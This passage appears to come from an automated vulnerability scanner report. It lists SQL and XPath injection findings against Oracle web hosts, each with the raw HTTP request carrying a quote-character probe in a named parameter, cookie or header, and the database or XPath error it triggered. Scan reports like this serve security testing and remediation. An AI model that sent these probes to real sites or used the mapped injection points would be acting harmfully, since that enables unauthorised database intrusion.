81871&f02=...[SNIP]... _arg_values=0439721E627C30CB548DADA8E65D95BA&p_arg_names=207519617010820548&p_t16=&p_arg_names=207519824975822807&p_t17=&p_arg_names=207743514465766863&p_t18=2627214932896553482' &p_arg_names=218393024595890180&p_t19=&p_arg_names=218443119998950207&p_t20=1&p_arg_names=218604801508085341&p_t21=Y&p_arg_names=218673005668381044&p_t22=See+Configurations&p_arg_names=218673227832387...[SNIP]...
Response
HTTP/1.1 200 OK-10g/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml">...[SNIP]... ORA-0 6502: PL/SQL: numeric or value error: character to number conversion error</div>...[SNIP]...
1.33. https://shop.oracle.com/pls/ostore/wwv_flow.accept [p_t19 parameter]
previous
next
Summary
Severity:
High
Confidence:
Firm
Host:
https://shop.oracle.com
Path:
/pls/ostore/wwv_flow.accept
Issue detail
The p_t19 parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the p_t19 parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
POST /pls/ostore/wwv_flow.accept HTTP/1.1-urlencoded/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/pls/ostore/f?p=dstore:product:0::NO:6:P6_LPI,P6_PROD_HIER_ID:4509235234901805719915,4509948309481805720010;q=0.3=7881107130450135; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; s_sq=%5B%5BB%5D%5D; s_pers=%20gpv_p24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Aproduct%253A0%253A%253ANO%253A6%253AP6_LPI%252CP6_PROD_HIER_ID%253A4509235234901805719915%252C4509948309481805720010%7C1318853885249%3B%20gpw_e24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Aproduct%253A0%253A%253ANO%253A6%253AP6_LPI%252CP6_PROD_HIER_ID%253A4509235234901805719915%252C4509948309481805720010%7C1318853885250%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleglobal%252Coraclestore%253D%252526pid%25253Dostore%2525253A%25252520product%25252520details%25252520%2525253A%25252520oracle%25252520crystal%25252520ball%252526pidt%25253D1%252526oid%25253Djavascript%2525253ASWaddToCart%25252528this%25252529%2525253B%252526ot%25253DA%2526oraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B_id=6&p_instance=7881107130450135&p_page_submission_id=1395912309489726&p_request=ADD_TO_CART&p_arg_names=206263118184316685&p_t01=Store+Search&f01=2275956057831485281871&f02=...[SNIP]... 8E65D95BA&p_arg_names=207519617010820548&p_t16=&p_arg_names=207519824975822807&p_t17=&p_arg_names=207743514465766863&p_t18=2627214932896553482&p_arg_names=218393024595890180&p_t19=' &p_arg_names=218443119998950207&p_t20=1&p_arg_names=218604801508085341&p_t21=Y&p_arg_names=218673005668381044&p_t22=See+Configurations&p_arg_names=218673227832387359&p_t23=Hide+Configurations&p_arg_na...[SNIP]...
Response
HTTP/1.1 200 OK-10g/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml">...[SNIP]... ORA-0 6502: PL/SQL: numeric or value error: character to number conversion error</div>...[SNIP]...
1.34. https://shop.oracle.com/pls/ostore/wwv_flow.accept [p_t31 parameter]
previous
next
Summary
Severity:
High
Confidence:
Firm
Host:
https://shop.oracle.com
Path:
/pls/ostore/wwv_flow.accept
Issue detail
The p_t31 parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the p_t31 parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
POST /pls/ostore/wwv_flow.accept HTTP/1.1-urlencoded/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/pls/ostore/f?p=dstore:product:0::NO:6:P6_LPI,P6_PROD_HIER_ID:4509235234901805719915,4509948309481805720010;q=0.3=7881107130450135; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; s_sq=%5B%5BB%5D%5D; s_pers=%20gpv_p24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Aproduct%253A0%253A%253ANO%253A6%253AP6_LPI%252CP6_PROD_HIER_ID%253A4509235234901805719915%252C4509948309481805720010%7C1318853885249%3B%20gpw_e24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Aproduct%253A0%253A%253ANO%253A6%253AP6_LPI%252CP6_PROD_HIER_ID%253A4509235234901805719915%252C4509948309481805720010%7C1318853885250%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleglobal%252Coraclestore%253D%252526pid%25253Dostore%2525253A%25252520product%25252520details%25252520%2525253A%25252520oracle%25252520crystal%25252520ball%252526pidt%25253D1%252526oid%25253Djavascript%2525253ASWaddToCart%25252528this%25252529%2525253B%252526ot%25253DA%2526oraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B_id=6&p_instance=7881107130450135&p_page_submission_id=1395912309489726&p_request=ADD_TO_CART&p_arg_names=206263118184316685&p_t01=Store+Search&f01=2275956057831485281871&f02=...[SNIP]... =252649917580681530&p_t27=&p_arg_names=207920229995643446&p_t28=N&p_arg_names=207924523705887677&p_t29=&p_arg_names=207924703404891203&p_t30=&p_arg_names=207924928123907820&p_t31=' &p_arg_names=207925107822911411&p_t32=&p_arg_names=207925329293917635&p_t33=1&p_arg_names=207925530116927342&p_t34=&p_arg_names=218324920070793075&p_t35=&p_arg_names=218325130112796005&p_t36=&p_arg_na...[SNIP]...
Response
HTTP/1.1 200 OK-10g/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml">...[SNIP]... ORA-0 6502: PL/SQL: numeric or value error: character to number conversion error</div>...[SNIP]...
1.35. https://shop.oracle.com/pls/ostore/wwv_flow.accept [p_t32 parameter]
previous
next
Summary
Severity:
High
Confidence:
Firm
Host:
https://shop.oracle.com
Path:
/pls/ostore/wwv_flow.accept
Issue detail
The p_t32 parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the p_t32 parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
POST /pls/ostore/wwv_flow.accept HTTP/1.1-urlencoded/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/pls/ostore/f?p=dstore:product:0::NO:6:P6_LPI,P6_PROD_HIER_ID:4509235234901805719915,4509948309481805720010;q=0.3=7881107130450135; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; s_sq=%5B%5BB%5D%5D; s_pers=%20gpv_p24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Aproduct%253A0%253A%253ANO%253A6%253AP6_LPI%252CP6_PROD_HIER_ID%253A4509235234901805719915%252C4509948309481805720010%7C1318853885249%3B%20gpw_e24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Aproduct%253A0%253A%253ANO%253A6%253AP6_LPI%252CP6_PROD_HIER_ID%253A4509235234901805719915%252C4509948309481805720010%7C1318853885250%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleglobal%252Coraclestore%253D%252526pid%25253Dostore%2525253A%25252520product%25252520details%25252520%2525253A%25252520oracle%25252520crystal%25252520ball%252526pidt%25253D1%252526oid%25253Djavascript%2525253ASWaddToCart%25252528this%25252529%2525253B%252526ot%25253DA%2526oraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B_id=6&p_instance=7881107130450135&p_page_submission_id=1395912309489726&p_request=ADD_TO_CART&p_arg_names=206263118184316685&p_t01=Store+Search&f01=2275956057831485281871&f02=...[SNIP]... =207920229995643446&p_t28=N&p_arg_names=207924523705887677&p_t29=&p_arg_names=207924703404891203&p_t30=&p_arg_names=207924928123907820&p_t31=&p_arg_names=207925107822911411&p_t32=' &p_arg_names=207925329293917635&p_t33=1&p_arg_names=207925530116927342&p_t34=&p_arg_names=218324920070793075&p_t35=&p_arg_names=218325130112796005&p_t36=&p_arg_names=218326006610817582&p_t37=&p_md5_ch...[SNIP]...
Response
HTTP/1.1 200 OK-10g/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml">...[SNIP]... ORA-0 6502: PL/SQL: numeric or value error: character to number conversion error</div>...[SNIP]...
1.36. http://solutions.oracle.com/portal/page/portal/searchresults [mo parameter]
previous
next
Summary
Severity:
High
Confidence:
Firm
Host:
http://solutions.oracle.com
Path:
/portal/page/portal/searchresults
Issue detail
The mo parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the mo parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
POST /portal/page/portal/searchresults HTTP/1.1.com-urlencoded/xhtml+xml,application/xml;q=0.9,*/*;q=0.8.com/home/basic_search;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; s_pers=%20gpv_p24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904888%3B%20gpw_e24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904890%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleglobal%252Coraclestore%253D%252526pid%25253Dostore%2525253A%25252520your%25252520shopping%25252520cart%252526pidt%25253D1%252526oid%25253Djavascript%2525253Aapex.submit%25252528%25252527CHECKOUT%25252527%25252529%252526ot%25253DA%2526oraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; portal=9.0.3+en-us+us+AMERICA+AF7E580109CB55C9E040578C51E13693+71B76364A799F1AE086BA84B020F2F3EBEEA355AC1C17754D73BC16CF6BBABBBEE0A9FA755DEF0C1E3A96613591765978399FACD6BDB5ECC45AE34718F31EDF6BA33CF3842A305D5B404D9685E436F73EEF25F27CBC8D9EF; BIGipServersolcat_pool=1292735117.25118.0000; s_cc=true; gpv_p24=http%3A//solutions.oracle.com/home/basic_search; gpw_e24=http%3A//solutions.oracle.com/home/basic_search; s_sq=%5B%5BB%5D%5D+search+faq+contact&mo=containsany' &sepg=57&fi=1&fs=57&pu=1&has=&as=2065%2C0&pao=equal&pav=&pan=sc_membership_location&pas=0&p_action=SUBMIT&ll=
Response
HTTP/1.1 200 OK-10g OracleAS-Web-Cache-10g/10.1.2.3.0 (TM;max-age=2592000+0;age=0;ecid=96377044523,1)results/xhtml1/DTD/xhtml1-transitional.dtd"> -->...[SNIP]... .process_text_match_operator -->Unexpected error - ORA-0 000: normal, successful completion<span style="white-space:nowrap;">...[SNIP]...
2. XPath injection
previous
next
There are 17 instances of this issue:
Issue background
XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Issue remediation
User input should be strictly validated before being incorporated into XPath queries. In most cases, it will be appropriate to accept input containing only short alhanumeric strings. At the very least, input containing any XPath metacharacters such as " ' / @ = * [ ] ( and ) should be rejected.
2.1. http://crmondemand.oracle.com/ocom/resources/sitestudio/ssajax/ssajax.js [GSI cookie]
previous
next
Summary
Severity:
High
Confidence:
Firm
Host:
http://crmondemand.oracle.com
Path:
/ocom/resources/sitestudio/ssajax/ssajax.js
Issue detail
The GSI cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the GSI cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request
GET /ocom/resources/sitestudio/ssajax/ssajax.js HTTP/1.1.com/en/index.htm;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C' ; s_cc=true; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON
Response
HTTP/1.1 200 OK379100"-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=300+0;age=31;ecid=49937809976033327,0:1)////////////////////////////////////////////////////...[SNIP]... .hasFeature;MENTATION_LEVEL2 = document.implementation && document.implementation.createDocument;XPATH _LEVEL3 = SSAjax.HAS_DOM_IMPLEMENTATION_LEVEL1 && document.implementation.hasFeature("XPath", "3.0");****************************************************...[SNIP]...
2.2. http://crmondemand.oracle.com/ocom/resources/sitestudio/ssajax/ssajax.js [ORA_MOS_LOCALE cookie]
previous
next
Summary
Severity:
High
Confidence:
Firm
Host:
http://crmondemand.oracle.com
Path:
/ocom/resources/sitestudio/ssajax/ssajax.js
Issue detail
The ORA_MOS_LOCALE cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the ORA_MOS_LOCALE cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request
GET /ocom/resources/sitestudio/ssajax/ssajax.js HTTP/1.1.com/en/index.htm;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en' ; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON
Response
HTTP/1.1 200 OK379100"-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=300+0;age=103;ecid=49714871108595606,0:1)////////////////////////////////////////////////////...[SNIP]... .hasFeature;MENTATION_LEVEL2 = document.implementation && document.implementation.createDocument;XPATH _LEVEL3 = SSAjax.HAS_DOM_IMPLEMENTATION_LEVEL1 && document.implementation.hasFeature("XPath", "3.0");****************************************************...[SNIP]...
2.3. http://crmondemand.oracle.com/ocom/resources/sitestudio/ssajax/ssajax.js [Referer HTTP header]
previous
next
Summary
Severity:
High
Confidence:
Firm
Host:
http://crmondemand.oracle.com
Path:
/ocom/resources/sitestudio/ssajax/ssajax.js
Issue detail
The Referer HTTP header appears to be vulnerable to XPath injection attacks. The payload %2527 was submitted in the Referer HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request
GET /ocom/resources/sitestudio/ssajax/ssajax.js HTTP/1.1/search?hl=en&q=%2527 ;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON
Response
HTTP/1.1 200 OK379100"-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=300+0;age=41;ecid=49938677559437373,0:1)////////////////////////////////////////////////////...[SNIP]... .hasFeature;MENTATION_LEVEL2 = document.implementation && document.implementation.createDocument;XPATH _LEVEL3 = SSAjax.HAS_DOM_IMPLEMENTATION_LEVEL1 && document.implementation.hasFeature("XPath", "3.0");****************************************************...[SNIP]...
2.4. http://crmondemand.oracle.com/ocom/resources/sitestudio/ssajax/ssajax.js [User-Agent HTTP header]
previous
next
Summary
Severity:
High
Confidence:
Firm
Host:
http://crmondemand.oracle.com
Path:
/ocom/resources/sitestudio/ssajax/ssajax.js
Issue detail
The User-Agent HTTP header appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the User-Agent HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request
GET /ocom/resources/sitestudio/ssajax/ssajax.js HTTP/1.1' .com/en/index.htm;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON
Response
HTTP/1.1 200 OK379100"-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=300+0;age=116;ecid=49716026454811337,0:1)////////////////////////////////////////////////////...[SNIP]... .hasFeature;MENTATION_LEVEL2 = document.implementation && document.implementation.createDocument;XPATH _LEVEL3 = SSAjax.HAS_DOM_IMPLEMENTATION_LEVEL1 && document.implementation.hasFeature("XPath", "3.0");****************************************************...[SNIP]...
2.5. http://crmondemand.oracle.com/ocom/resources/sitestudio/ssajax/ssajax.js [gpv_p24 cookie]
previous
next
Summary
Severity:
High
Confidence:
Firm
Host:
http://crmondemand.oracle.com
Path:
/ocom/resources/sitestudio/ssajax/ssajax.js
Issue detail
The gpv_p24 cookie appears to be vulnerable to XPath injection attacks. The payload %2527 was submitted in the gpv_p24 cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request
GET /ocom/resources/sitestudio/ssajax/ssajax.js HTTP/1.1.com/en/index.htm;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..%2527 ; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON
Response
HTTP/1.1 200 OK379100"-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=300+0;age=34;ecid=49938071969041314,0:1)////////////////////////////////////////////////////...[SNIP]... .hasFeature;MENTATION_LEVEL2 = document.implementation && document.implementation.createDocument;XPATH _LEVEL3 = SSAjax.HAS_DOM_IMPLEMENTATION_LEVEL1 && document.implementation.hasFeature("XPath", "3.0");****************************************************...[SNIP]...
2.6. http://crmondemand.oracle.com/ocom/resources/sitestudio/ssajax/ssajax.js [gpw_e24 cookie]
previous
next
Summary
Severity:
High
Confidence:
Firm
Host:
http://crmondemand.oracle.com
Path:
/ocom/resources/sitestudio/ssajax/ssajax.js
Issue detail
The gpw_e24 cookie appears to be vulnerable to XPath injection attacks. The payload %2527 was submitted in the gpw_e24 cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request
GET /ocom/resources/sitestudio/ssajax/ssajax.js HTTP/1.1.com/en/index.htm;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..%2527 ; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON
Response
HTTP/1.1 200 OK379100"-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=300+0;age=36;ecid=49938291012375918,0:1)////////////////////////////////////////////////////...[SNIP]... .hasFeature;MENTATION_LEVEL2 = document.implementation && document.implementation.createDocument;XPATH _LEVEL3 = SSAjax.HAS_DOM_IMPLEMENTATION_LEVEL1 && document.implementation.hasFeature("XPath", "3.0");****************************************************...[SNIP]...
2.7. http://crmondemand.oracle.com/ocom/resources/sitestudio/ssajax/ssajax.js [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Firm
Host:
http://crmondemand.oracle.com
Path:
